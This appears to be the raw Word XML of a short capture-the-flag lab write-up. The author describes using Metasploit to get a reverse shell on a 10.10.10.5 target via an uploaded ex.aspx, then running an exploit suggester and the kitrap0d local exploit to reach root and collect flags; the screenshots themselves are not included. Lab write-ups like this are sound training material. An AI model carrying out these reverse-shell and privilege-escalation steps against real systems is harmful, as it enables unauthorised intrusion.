          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11BECDBE" wp14:editId="5FE7B446">
            <wp:extent cx="4953691" cy="12765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DCB9" w14:textId="414CC412" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="0088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0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DBB20E6" w14:textId="1C941D32" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="0088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0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, I run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msfonsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/Metasploit for my reverse shell exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C5A502" w14:textId="223E6500" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="0088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0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EB56380" wp14:editId="43ED7C81">
            <wp:extent cx="5943600" cy="2275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1B69" w14:textId="7930DA2E" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="0088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0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="622F20CD" w14:textId="26DAD4A1" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="0088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0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I must set the correct payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFD5B6B" w14:textId="1A6DC043" w:rsidR="0088748F" w:rsidRPr="0088748F" w:rsidRDefault="0088748F" w:rsidP="00887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0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F75968A" wp14:editId="3AD4BD19">
            <wp:extent cx="5943600" cy="2844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39A3" w14:textId="64AB20F4" w:rsidR="0088748F" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r>
        <w:t>Next,</w:t>
      </w:r>
      <w:r w:rsidR="00414D89">
        <w:t xml:space="preserve"> I </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00414D89">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00414D89">
        <w:t xml:space="preserve"> set the correct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141C2010" w14:textId="5F722F52" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r w:rsidRPr="001E0DE2">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79E27A0D" wp14:editId="02E9D3E2">
            <wp:extent cx="5943600" cy="3155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576A" w14:textId="3E42CBB3" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r>
        <w:t>After I ran it, it is listening on port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03138CEF" w14:textId="22AD933A" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r>
        <w:t>One I search 10.10.10.5/ex.aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F5E83E" w14:textId="71B595A3" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">My reverse shell was successful </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3A92D6" w14:textId="47A288B2" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r w:rsidRPr="001E0DE2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B805291" wp14:editId="7A73CD93">
            <wp:extent cx="5943600" cy="2591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FE17" w14:textId="568B7B90" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">Once I ran </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, I was not evaluated privileges </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40103641" w14:textId="0DA96FC5" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">I had to dig deeper </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3831848D" w14:textId="0B93F3F8" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">I had to search a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and limit the session to 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460327F1" w14:textId="4AAA2D40" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r w:rsidRPr="001E0DE2">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="223CF56B" wp14:editId="4AAF85BB">
            <wp:extent cx="5943600" cy="3235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6D3AD" w14:textId="7C18B003" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">It returned some vulnerabilities </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A256983" w14:textId="77F24952" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r>
        <w:t>But I went with kitrap0d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F3D36A" w14:textId="3C5BA865" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r w:rsidRPr="001E0DE2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B7B6754" wp14:editId="56209E09">
            <wp:extent cx="5943600" cy="25514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FE77" w14:textId="63C64088" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r w:rsidRPr="001E0DE2">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DFCE4C5" wp14:editId="743D03C3">
            <wp:extent cx="5943600" cy="3693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8270" w14:textId="77777777" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B"/>
    <w:p w14:paraId="281BA0B5" w14:textId="1252634E" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">I selected run and it did not work </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CBB28D" w14:textId="4A47778B" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">I ran </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C1F540" w14:textId="30EB2870" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r w:rsidRPr="001E0DE2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C0E5343" wp14:editId="1841D73E">
            <wp:extent cx="5943600" cy="2558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B0C08" w14:textId="72B8F1F6" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">Saw my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ethernet was connected but not my flag IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BB9440" w14:textId="627B2FE8" w:rsidR="00632E4B" w:rsidRDefault="0088748F" w:rsidP="00632E4B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E0DE2" w:rsidRPr="001E0DE2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19DE4F94" wp14:editId="1B956467">
            <wp:extent cx="5943600" cy="31026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9CFD8" w14:textId="320261EC" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">Session died, had to rerun session </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5490368E" w14:textId="77777777" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B"/>
    <w:p w14:paraId="37D3EFB5" w14:textId="20736058" w:rsidR="00632E4B" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r w:rsidRPr="001E0DE2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49416F39" wp14:editId="6BB38ED3">
            <wp:extent cx="5943600" cy="37293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3DFFF" w14:textId="0DDA9C5A" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r w:rsidRPr="001E0DE2">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37C5C479" wp14:editId="671AE546">
            <wp:extent cx="5943600" cy="29584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EE15" w14:textId="055B73EE" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r w:rsidRPr="001E0DE2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="656791D7" wp14:editId="628437BF">
            <wp:extent cx="5943600" cy="28994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B2743" w14:textId="36DF4C31" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r w:rsidRPr="001E0DE2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C144A20" wp14:editId="68CA605A">
            <wp:extent cx="5943600" cy="16300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B211" w14:textId="354337E1" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r>
        <w:t>Got the user Flag in the txt!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC38648" w14:textId="2D5D694D" w:rsidR="001E0DE2" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r w:rsidRPr="001E0DE2">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CE1C1D3" wp14:editId="2AD7A18D">
            <wp:extent cx="5943600" cy="17252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88F5" w14:textId="656DDB41" w:rsidR="001E0DE2" w:rsidRPr="00632E4B" w:rsidRDefault="001E0DE2" w:rsidP="00632E4B">
      <w:r>
        <w:t>Same with root! Success</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="001E0DE2" w:rsidRPr="00632E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E4B"/>
    <w:rsid w:val="001E0DE2"/>
    <w:rsid w:val="00332ADA"/>
    <w:rsid w:val="00414D89"/>
    <w:rsid w:val="00632E4B"/>
    <w:rsid w:val="0088748F"/>
    <w:rsid w:val="008D5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FD44E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0C293A92-CE57-428D-8B51-0E643F34F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874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874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01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502</Words>
  <Characters>2867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Wyrick, Kyle</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Wyrick, Kyle</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-10T00:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-10T00:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>